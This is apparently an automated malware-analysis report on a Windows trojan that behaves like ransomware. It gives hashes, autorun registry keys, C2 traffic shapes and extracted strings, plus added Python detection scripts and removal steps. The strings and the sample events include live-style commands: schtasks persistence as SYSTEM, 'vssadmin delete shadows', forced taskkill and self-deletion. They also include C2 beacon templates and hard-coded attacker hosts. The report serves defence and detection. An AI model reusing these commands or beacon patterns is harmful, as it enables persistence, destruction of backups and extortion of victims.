Trojan.Win32.Swrort_0648ee5d23
Trojan.Win32.Swrort.4.FD, TrojanSwrort.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 0648ee5d230adef499107434a4f62525
SHA1: d48eb459b061d4420295891c2f30822a5f13d4fc
SHA256: 37450cf9a93b6e06f9bf10252cd66a3f0604d3be1a4cc48a9b3105070fae1181
SSDeep: 3072:wjcprkEusAuRz9rKslr3GEqACD1Ryy0JeKELJZd:S9SXrJ2EDo1Ryy0cKMZd
Size: 208896 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: no certificate found
Created at: 2015-12-18 16:31:21
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
DirectX.exe:1460
%original file name%.exe:1504
%original file name%.exe:580
taskkill.exe:1296
The Trojan injects its code into the following process(es):
DirectX.exe:1416
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:1504 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\DirectX.exe (1281 bytes)
Registry activity
The process DirectX.exe:1460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry (the Shell Folders, MountPoints2 and Cryptography\RNG\Seed writes listed in this section are side effects of ordinary shell and CryptoAPI calls and are not useful indicators; the Run values further down are):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
The process DirectX.exe:1416 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B C5 CC 14 9C D9 62 CC F5 B4 93 4F A1 AE E8 93"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"DirectX" = "%WinDir%\DirectX.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"DirectX" = "%WinDir%\DirectX.exe"
The process %original file name%.exe:1504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 C7 3E AB AF 06 FA 23 22 8B B8 CD 52 32 97 A8"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%WinDir%]
"Directx.exe" = "d"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan sets the following Internet Explorer security-zone mapping values (all three equal the Windows XP defaults, so the sandbox most likely recorded existing values being rewritten; treat them as low-confidence indicators):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1" (include all local intranet sites not listed in other zones in the Intranet Zone)
"UNCAsIntranet" = "1" (include all network paths (UNCs) in the Intranet Zone)
"ProxyBypass" = "1" (include all sites that bypass the proxy server in the Intranet Zone)
The process %original file name%.exe:580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
The process taskkill.exe:1296 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F6 00 B8 E7 FF E6 DD 27 B8 28 A9 DE 86 84 E5 4F"
Dropped PE files
There are no dropped PE files.
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name:
Product Name: d
Product Version: 1, 0, 0, 1
Legal Copyright: (C) 2011
Legal Trademarks:
Original Filename: d.exe
Internal Name: d
File Version: 1, 0, 0, 1
File Description: d
Comments:
Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 25149 | 28672 | 2.65407 | 355c7954cead664c6cc5a948ea187001 |
| .rdata | 32768 | 4575 | 8192 | 1.37478 | 5d76d11b92b0ca55da2ac59c9ea0ddd3 |
| .data | 40960 | 9060 | 12288 | 1.59352 | 9f0975d035ba01d7054b63dfc1a547fe |
| .idata | 53248 | 4494 | 8192 | 1.81183 | dada91a128ff46a6983d7f7bf3acf50b |
| .rsrc | 61440 | 104660 | 106496 | 5.39039 | a8aca6552b9aef852c45a2cb3b97a42e |
| .reloc | 167936 | 2289 | 4096 | 2.53629 | 4527fb54b4c9b63d136e67f2af80e4f3 |
| .pula | 172032 | 2610 | 4096 | 2.31314 | 7653801c776b34a3aeb4e5dcfc6a6a89 |
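The section table above is the kind of thing worth reproducing yourself rather than trusting a report: a non-standard name such as `.pula`, a section whose entropy is far above its neighbours, or a section that is both writable and executable is where unpacking stubs and embedded payloads tend to live. The script below is an added example, not Lavasoft tooling: it walks the DOS header, PE signature, COFF header and section table with the standard library only, computes the same per-section entropy and MD5 columns, and flags the sections a reviewer should open first. The image produced by `build_sample_pe()` is constructed for the demo (no optional header, so it is not loadable); pass a real file path as the first argument to run it on a sample.

```python
"""Parse a PE section table, compute per-section entropy and MD5, flag oddities.
Added example using only the standard library; not Lavasoft tooling.
The image built by build_sample_pe() is constructed for the demo."""
import hashlib
import math
import struct
import sys

# Section names a Visual C++ linker normally emits; anything else deserves a look.
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".idata", ".edata", ".rsrc",
                     ".reloc", ".bss", ".tls", ".pdata", ".CRT"}
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_HDR = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant data, 8.0 for uniformly random data."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> list[dict]:
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size           # section table follows the optional header
    sections = []
    for i in range(nsections):
        (name, vsize, va, raw_size, raw_ptr,
         _, _, _, _, chars) = struct.unpack_from(SECTION_HDR, pe, table + 40 * i)
        raw = pe[raw_ptr:raw_ptr + raw_size]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": va, "virtual_size": vsize, "raw_size": raw_size,
            "entropy": shannon_entropy(raw), "md5": hashlib.md5(raw).hexdigest(),
            "characteristics": chars,
        })
    return sections


def assess(sections: list[dict]) -> dict:
    """Map section name -> list of reasons it merits attention."""
    findings = {}
    for s in sections:
        reasons = []
        if s["name"] not in STANDARD_SECTIONS:
            reasons.append("non-standard section name")
        if s["entropy"] >= 7.0:
            reasons.append("high entropy (packed or encrypted content)")
        if s["characteristics"] & IMAGE_SCN_MEM_WRITE and s["characteristics"] & IMAGE_SCN_MEM_EXECUTE:
            reasons.append("writable and executable (RWX)")
        if s["raw_size"] == 0 and s["virtual_size"] > 0:
            reasons.append("no data on disk but memory reserved (unpacking target)")
        if reasons:
            findings[s["name"]] = reasons
    return findings


def build_sample_pe(sections: list[tuple[bytes, bytes, int]]) -> bytes:
    """Constructed minimal PE32: DOS stub, COFF header, no optional header.
    Not loadable, but exactly what parse_sections() needs. Demo input only."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    table, blobs, raw_ptr, va = b"", b"", 0x200, 0x1000
    for name, data, chars in sections:
        raw_size = (len(data) + 0x1FF) & ~0x1FF          # 512-byte file alignment
        table += struct.pack(SECTION_HDR, name.ljust(8, b"\0"), len(data), va,
                             raw_size, raw_ptr, 0, 0, 0, 0, chars)
        blobs += data.ljust(raw_size, b"\0")
        raw_ptr += raw_size
        va += (len(data) + 0xFFF) & ~0xFFF               # 4 KiB section alignment
    headers = (dos + b"PE\0\0" + coff + table).ljust(0x200, b"\0")
    return headers + blobs


# Constructed demo: a boring code section and an RWX, high-entropy extra section.
SAMPLE_SECTIONS = [
    (b".text", b"\x90" * 511 + b"\xC3", 0x60000020),   # code | execute | read
    (b".pula", bytes(range(256)) * 4, 0xE0000040),     # data | execute | read | write
]

if __name__ == "__main__":
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe(SAMPLE_SECTIONS)
    secs = parse_sections(image)
    print(f"{'Name':8} {'VA':>8} {'VSize':>8} {'RawSize':>8} {'Entropy':>8}  MD5")
    for s in secs:
        print(f"{s['name']:8} {s['virtual_address']:>8} {s['virtual_size']:>8} "
              f"{s['raw_size']:>8} {s['entropy']:>8.5f}  {s['md5']}")
    for name, reasons in assess(secs).items():
        print(f"[!] {name}: {'; '.join(reasons)}")
```

Entropy and MD5 are computed over the raw on-disk bytes (`PointerToRawData` to `PointerToRawData + SizeOfRawData`), which is what a report column like the one above normally means; alignment padding is therefore included, so a tiny section padded with zeros will read as low entropy even if its few real bytes are random.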
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://checkip.dyndns.com/ | |
| hxxp://checkip.dyndns.org/ | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY DynDNS CheckIp External IP Address Server Response
Traffic
GET / HTTP/1.1
Host: checkip.dyndns.org
Content-Type: application/x-www-form-urlencoded
HTTP/1.1 200 OK
Content-Type: text/html
Server: DynDNS-CheckIP/1.0
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 106

<html><head><title>Current IP Check</title></head><body>Current IP Address: 194.242.96.218</body></html>
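Two details of the exchange above are usable as network indicators: the external-IP lookup itself (the basis of the ET POLICY alert), and the fact that the sample's hard-coded request template sends `Content-Type: application/x-www-form-urlencoded` on a GET with no body, which a browser never does. The strings listing further down also gives the shape of the C2 traffic: a POST to domains.php, API.php or mask.php whose body follows `id=%s&apt=%i&os=%s&ip=%s&bits=%s&discs=%s&pub=%s&prv=`, `id=%s&s=%i` or `id=%s&ip=%s`, and a GET to `/ld/?id=%s` from the dropped YOUR_FILES.url shortcut. The classifier below is an added example, not Lavasoft code; the request and response texts are constructed, with a documentation-range address and placeholder identifiers, and the C2 hostname `c2.example` is a stand-in rather than anything taken from the sample.

```python
"""Classify the sample's HTTP traffic: CheckIP lookup and C2 request shapes.
Added example, not Lavasoft code. Samples below are constructed."""
import re
from urllib.parse import parse_qs, urlsplit

CHECKIP_HOSTS = {"checkip.dyndns.org", "checkip.dyndns.com"}
BEACON_SCRIPTS = {"domains.php", "api.php", "mask.php"}
REGISTRATION_KEYS = {"id", "apt", "os", "ip", "bits", "discs", "pub", "prv"}


def parse_http_request(raw: str) -> dict:
    """Minimal HTTP/1.1 request parser: request line, headers (lower-cased names), body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    return {"method": method.upper(), "path": url.path,
            "query": parse_qs(url.query), "headers": headers, "body": body}


def parse_checkip_response(raw: str):
    """Extract the address the CheckIP service echoed back, or None."""
    m = re.search(r"Current IP Address:\s*(\d{1,3}(?:\.\d{1,3}){3})", raw)
    return m.group(1) if m else None


def classify(req: dict) -> list[str]:
    hits = []
    host = req["headers"].get("host", "").lower()
    ctype = req["headers"].get("content-type", "").lower()
    if host in CHECKIP_HOSTS:
        hits.append("external_ip_lookup")
    # The sample's request template puts a form Content-Type on a bodiless GET;
    # browsers do not, so this fingerprints the client rather than the server.
    if req["method"] == "GET" and ctype.startswith("application/x-www-form-urlencoded") and not req["body"]:
        hits.append("form_content_type_on_bodiless_get")
    script = req["path"].rsplit("/", 1)[-1].lower()
    if req["method"] == "POST" and script in BEACON_SCRIPTS:
        keys = set(parse_qs(req["body"], keep_blank_values=True))
        if REGISTRATION_KEYS <= keys:
            hits.append("registration_beacon")   # id/apt/os/ip/bits/discs/pub/prv
        elif keys == {"id", "s"}:
            hits.append("status_beacon")         # id=%s&s=%i
        elif keys == {"id", "ip"}:
            hits.append("ip_update_beacon")      # id=%s&ip=%s
        else:
            hits.append("beacon_unknown_shape")
    if req["method"] == "GET" and req["path"].startswith("/ld/") and "id" in req["query"]:
        hits.append("victim_page_fetch")         # URL=hxxp://%s/ld/?id=%s
    return hits


# Constructed samples: 203.0.113.0/24 documentation range, placeholder id and key blobs.
REQ_CHECKIP = ("GET / HTTP/1.1\r\nHost: checkip.dyndns.org\r\n"
               "Content-Type: application/x-www-form-urlencoded\r\n\r\n")
RESP_CHECKIP = ("HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nServer: DynDNS-CheckIP/1.0\r\n"
                "Connection: close\r\n\r\n<html><head><title>Current IP Check</title></head>"
                "<body>Current IP Address: 203.0.113.7</body></html>")
REQ_REGISTER = ("POST /API.php HTTP/1.1\r\nHost: c2.example\r\n"
                "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
                "id=0A1B2C3D&apt=0&os=Windows XP&ip=203.0.113.7&bits=32&discs=C:&pub=PUBBLOB&prv=")
REQ_STATUS = ("POST /mask.php HTTP/1.1\r\nHost: c2.example\r\n"
              "Content-Type: application/x-www-form-urlencoded\r\n\r\nid=0A1B2C3D&s=1")
REQ_LANDING = "GET /ld/?id=0A1B2C3D HTTP/1.1\r\nHost: c2.example\r\n\r\n"
REQ_BENIGN = "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n"

if __name__ == "__main__":
    print("checkip reply ->", parse_checkip_response(RESP_CHECKIP))
    for raw in (REQ_CHECKIP, REQ_REGISTER, REQ_STATUS, REQ_LANDING, REQ_BENIGN):
        req = parse_http_request(raw)
        print(req["method"], req["path"], classify(req))
```

The body keys are matched as a set rather than as a fixed order because the template is built with sprintf and a later build could reorder or extend it; `keep_blank_values=True` matters because the registration template ends in `prv=` with nothing after it, and the default would drop that key.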
The Trojan connects to the servers at the following location(s): checkip.dyndns.org (see URLs above). Strings extracted from the sample and from the memory regions of the injected DirectX.exe process (PID 1416) follow:
.text
`.data
.rdata
@.bss
.idata
.rsrc
piratedreed.com
domains.php
API.php
mask.php
194.242.96.218
%s%s.RDM
%s*.*
%s%s\
%s%c%c%c%c%c%c
%d.%d.%d
Software\Microsoft\Windows\CurrentVersion\Run
%s\system32\wbem\wmic.exe
process call create "cmd.exe /c schtasks /create /tn MONITOR1 /tr %s /sc ONSTART /ru SYSTEM"
process call create "cmd.exe /c vssadmin delete shadows /all /quiet"
%sX
Software\Microsoft\%s
taskkill /f /im %s
del %s /s /q
del %s
aaa.bat
103.25.202.192
92.222.80.28
78.138.97.93
POST /%s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded
GET /%s HTTP/1.1
%s\%s
advapi32.dll
process call create "cmd /c start %s"
id=%s&apt=%i&os=%s&ip=%s&bits=%s&discs=%s&pub=
%s&prv=
id=%s&s=%i
%s\DirectX.exe
%s\directx.exe
id=%s&ip=%s
hXXp://%s/ld/?id=%s
URL=hXXp://%s/ld/?id=%s
YOUR_FILES.url
checkip.dyndns.org
%s:%u: failed assertion `%s'
CryptExportKey
CryptGenKey
CryptImportKey
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
GetWindowsDirectoryA
WinExec
ShellExecuteA
GetKeyboardType
ADVAPI32.DLL
DNSAPI.DLL
WS2_32.DLL
KERNEL32.dll
msvcrt.dll
SHELL32.DLL
USER32.dll
directx.exe
DirectX.exe_1416_rwx_00300000_00100000:
.text
DirectX.exe_1416_rwx_00400000_00834000:
.text
`.data
.rdata
@.bss
.idata
.rsrc
piratedreed.com
domains.php
API.php
mask.php
194.242.96.218
%s%s.RDM
%s*.*
%s%s\
%s%c%c%c%c%c%c
%d.%d.%d
Software\Microsoft\Windows\CurrentVersion\Run
%s\system32\wbem\wmic.exe
process call create "cmd.exe /c schtasks /create /tn MONITOR1 /tr %s /sc ONSTART /ru SYSTEM"
process call create "cmd.exe /c vssadmin delete shadows /all /quiet"
%sX
Software\Microsoft\%s
taskkill /f /im %s
del %s /s /q
del %s
aaa.bat
103.25.202.192
92.222.80.28
78.138.97.93
POST /%s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded
GET /%s HTTP/1.1
%s\%s
advapi32.dll
process call create "cmd /c start %s"
id=%s&apt=%i&os=%s&ip=%s&bits=%s&discs=%s&pub=
%s&prv=
id=%s&s=%i
%s\DirectX.exe
%s\directx.exe
id=%s&ip=%s
hXXp://%s/ld/?id=%s
URL=hXXp://%s/ld/?id=%s
YOUR_FILES.url
checkip.dyndns.org
%s:%u: failed assertion `%s'
CryptExportKey
CryptGenKey
CryptImportKey
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
GetWindowsDirectoryA
WinExec
ShellExecuteA
GetKeyboardType
ADVAPI32.DLL
DNSAPI.DLL
WS2_32.DLL
KERNEL32.dll
msvcrt.dll
SHELL32.DLL
USER32.dll
127.0.0.1
directx.exe
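The strings above describe more host behaviour than the sandbox run recorded: wmic `process call create` used to launch cmd.exe, a scheduled task named MONITOR1 created with `/sc ONSTART /ru SYSTEM`, `vssadmin delete shadows /all /quiet`, a `taskkill /f /im` plus `del` self-removal batch (aaa.bat), and the DirectX Run-key autorun pointing at an executable dropped directly in %WinDir%. Only taskkill.exe and the DirectX.exe process appear in the process list, so the schtasks and vssadmin commands are capabilities the binary carries rather than observed events. The detection logic below is an added example, not Lavasoft code; it runs over JSON lines constructed to resemble Sysmon event ID 1 (process create) and 13 (registry value set) as a log shipper would export them, and the field names and the %WinDir% allowlist are assumptions to adapt to your own pipeline.

```python
"""Host-side detections for the behaviour encoded in the sample's strings.
Added example, not Lavasoft code. Event lines are constructed; field names
(event_id, image, parent_image, command_line, target_object, details) are assumed."""
import json
import re

# Executables that legitimately live directly in %WinDir% (illustrative, tune it).
WINDIR_ROOT_ALLOW = {"explorer.exe", "notepad.exe", "regedit.exe", "hh.exe",
                     "write.exe", "winhlp32.exe", "bfsvc.exe", "splwow64.exe"}
WINDIR_ROOT_EXE = re.compile(r"^[a-z]:\\windows\\([^\\]+\.exe)$", re.I)
RUN_VALUE = re.compile(r"\\microsoft\\windows\\currentversion\\(run|runonce)\\[^\\]+$", re.I)


def _tokens(cmd: str) -> list[str]:
    """Lower-cased tokens with quotes removed, so the command wmic passes as one
    quoted argument (cmd.exe /c schtasks ...) is inspected as well."""
    return [t.lower() for t in re.findall(r'[^\s"]+', cmd)]


def _has_exe(tokens: list[str], name: str) -> bool:
    return any(t.rsplit("\\", 1)[-1] in (name, name + ".exe") for t in tokens)


def _arg(tokens: list[str], flag: str):
    """Value following a /flag token, or None."""
    for i in range(len(tokens) - 1):
        if tokens[i] == flag:
            return tokens[i + 1]
    return None


def check_command_line(cmd: str) -> list[str]:
    t = _tokens(cmd)
    joined = " ".join(t)
    hits = []
    if _has_exe(t, "wmic") and "process call create" in joined:
        hits.append("wmic_process_call_create")
    if _has_exe(t, "schtasks") and "/create" in t \
            and _arg(t, "/sc") == "onstart" and _arg(t, "/ru") == "system":
        hits.append("schtasks_onstart_as_system")
    if _has_exe(t, "vssadmin") and "delete shadows" in joined:
        hits.append("vssadmin_delete_shadows")
    if _has_exe(t, "taskkill") and "/f" in t and "/im" in t:
        hits.append("taskkill_force_kill")
    if _has_exe(t, "cmd") and "start" in t and any(x.endswith(".bat") for x in t):
        hits.append("cmd_start_batch")
    return hits


def check_image(image: str) -> list[str]:
    """Executables directly in %WinDir% root are rare; DirectX.exe is not a Windows file."""
    m = WINDIR_ROOT_EXE.match(image)
    if m and m.group(1).lower() not in WINDIR_ROOT_ALLOW:
        return ["image_in_windows_root"]
    return []


def check_registry(target_object: str, details: str) -> list[str]:
    if not RUN_VALUE.search(target_object):
        return []
    hits = ["autorun_value_set"]
    m = WINDIR_ROOT_EXE.match(details.strip('"'))
    if m and m.group(1).lower() not in WINDIR_ROOT_ALLOW:
        hits.append("autorun_exe_in_windows_root")
    return hits


def scan(jsonl: str) -> list[dict]:
    """Run every check over a JSON-lines export and return one finding per hit."""
    findings = []
    for line in jsonl.strip().splitlines():
        ev = json.loads(line)
        if ev["event_id"] == 1:
            rules = check_image(ev["image"]) + check_command_line(ev["command_line"])
            detail = ev["command_line"]
        elif ev["event_id"] == 13:
            rules = check_registry(ev["target_object"], ev["details"])
            detail = ev["target_object"] + " = " + ev["details"]
        else:
            continue
        findings += [{"rule": r, "image": ev["image"], "detail": detail} for r in rules]
    return findings


# Constructed events mirroring the process/registry activity and string templates above.
SAMPLE_EVENTS = r'''
{"event_id": 1, "image": "C:\\Windows\\DirectX.exe", "parent_image": "C:\\Users\\victim\\Downloads\\d.exe", "command_line": "C:\\Windows\\DirectX.exe"}
{"event_id": 13, "image": "C:\\Windows\\DirectX.exe", "target_object": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\DirectX", "details": "C:\\Windows\\DirectX.exe"}
{"event_id": 1, "image": "C:\\Windows\\System32\\wbem\\WMIC.exe", "parent_image": "C:\\Windows\\DirectX.exe", "command_line": "wmic process call create \"cmd.exe /c schtasks /create /tn MONITOR1 /tr C:\\Windows\\DirectX.exe /sc ONSTART /ru SYSTEM\""}
{"event_id": 1, "image": "C:\\Windows\\System32\\wbem\\WMIC.exe", "parent_image": "C:\\Windows\\DirectX.exe", "command_line": "wmic process call create \"cmd.exe /c vssadmin delete shadows /all /quiet\""}
{"event_id": 1, "image": "C:\\Windows\\System32\\cmd.exe", "parent_image": "C:\\Users\\victim\\Downloads\\d.exe", "command_line": "cmd /c start C:\\Users\\victim\\AppData\\Local\\Temp\\aaa.bat"}
{"event_id": 1, "image": "C:\\Windows\\System32\\taskkill.exe", "parent_image": "C:\\Windows\\System32\\cmd.exe", "command_line": "taskkill /f /im d.exe"}
{"event_id": 1, "image": "C:\\Windows\\System32\\svchost.exe", "parent_image": "C:\\Windows\\System32\\services.exe", "command_line": "C:\\Windows\\System32\\svchost.exe -k netsvcs"}
'''

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['rule']}] {f['image']}: {f['detail']}")
```

Tokenising with quotes stripped is the point of `_tokens()`: Sysmon records the wmic command line with the inner `cmd.exe /c schtasks ...` as a single quoted argument, and a rule that only looks at the outer process would see wmic and miss the task creation. `taskkill_force_kill` and `cmd_start_batch` are weak on their own and are meant to be correlated with the parent chain or the other hits, not alerted on individually.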
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
DirectX.exe:1460
%original file name%.exe:1504
%original file name%.exe:580
taskkill.exe:1296
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%WinDir%\DirectX.exe (1281 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"DirectX" = "%WinDir%\DirectX.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"DirectX" = "%WinDir%\DirectX.exe"
- Check Task Scheduler for a task named MONITOR1 and delete it if present: the sample carries the command template "schtasks /create /tn MONITOR1 /tr <path> /sc ONSTART /ru SYSTEM" (see the strings above), although this run did not record the task being created. The sample also carries "vssadmin delete shadows /all /quiet"; if that ran, Volume Shadow Copies will not be available for file recovery.
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.